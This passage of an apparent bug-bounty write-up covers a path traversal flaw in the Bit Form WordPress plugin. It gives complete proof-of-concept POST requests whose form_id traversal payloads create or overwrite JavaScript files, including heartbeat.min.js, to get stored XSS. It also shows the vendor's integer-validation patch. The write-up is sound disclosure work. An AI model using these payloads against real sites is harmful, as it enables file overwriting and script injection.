    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      FrontEndScriptGenerator::customCodeFile($input->form_id, $input->customCodes);
      [...]
    } else {
      [...]
    }
  }

Throughout the entire execution flow, there's no validation over the form_id and customCodes. Therefore, we can overwrite or create arbitrary JavaScript and CSS files via path traversal in form_id.

Let's try to create an arbitrary JavaScript file at path /var/www/html/ by sending the following POST request:

POST /wp-admin/admin-ajax.php?action=bitforms_add_custom_code&_ajax_nonce=780bef0a26 HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 119
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724553914%7C9pNaCWccoYSDyYoiSO4e07YnorNyXoFaKEF0H5QnZkX%7C58c18d2f8b6415954d2a339d57d57b3c1fe7bc913f22130d5780f0d2a85c49f9; wp-settings-time-1=1724390118; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724553914%7C9pNaCWccoYSDyYoiSO4e07YnorNyXoFaKEF0H5QnZkX%7Cf943227a153b21afbc65dbd93c78032c2ad0055a49af9c5fedf5d1281404dbd7

{"form_id":"/../../../../../../../../../../../var/www/html/poc","customCodes":{"JavaScript":"alert(document.domain);"}}

┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/stored-xss)-[2024.08.23|14:10:24(HKT)]
└> curl http://localhost/poc.js
alert(document.domain);

Nice! It worked!

However, since this JavaScript is not imported anywhere, we'll need to overwrite a JavaScript file in order to trigger the XSS payload.

To find one, we can go to the admin dashboard and get 1 imported JavaScript file:

We can choose whatever JavaScript file is imported in here. In my case, I picked /wp-includes/js/heartbeat.min.js.

Now we can try to overwrite that JavaScript file with the following payload:

{"form_id":"/../../../../../../../../../../../var/www/html/wp-includes/js/heartbeat.min","customCodes":{"JavaScript":"alert(document.domain);"}}

Then hard refresh (Ctrl + Shift + R) the admin dashboard page to import our XSS payload JavaScript file:

Nice, it worked!

Note: The reason we need to hard refresh is that the original JavaScript file was cached.

The Patch

To fix this vulnerability, the vendor needs to validate the form_id variable to be type integer only. We can view version 2.13.10 revision log in details:

class AdminAjax
{
  [...]
  public function addCustomCode()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formId = sanitize_text_field($input->form_id);
      if (filter_var($formId, FILTER_VALIDATE_INT)) {
        FrontEndScriptGenerator::customCodeFile($formId, $input->customCodes);
        [...]
      } else {
        [...]
      }
    } else {
      [...]
    }
  }

Timeline

Conclusion

Ultimately, I found total of 7 vulnerabilities in this plugin. However, all of them require administrator+ privilege to be able to exploit the vulnerabilities, which means they're all out-of-scope. BUT! I didn't feel disappointed, matter of fact I actually felt very happy, because I found my first vulnerability in a real application outside from CTFs!

In the next part, I'll be talking about how I found multiple vulnerabilities in 5 different WordPress plugins that use the same PHP library. Stay tuned!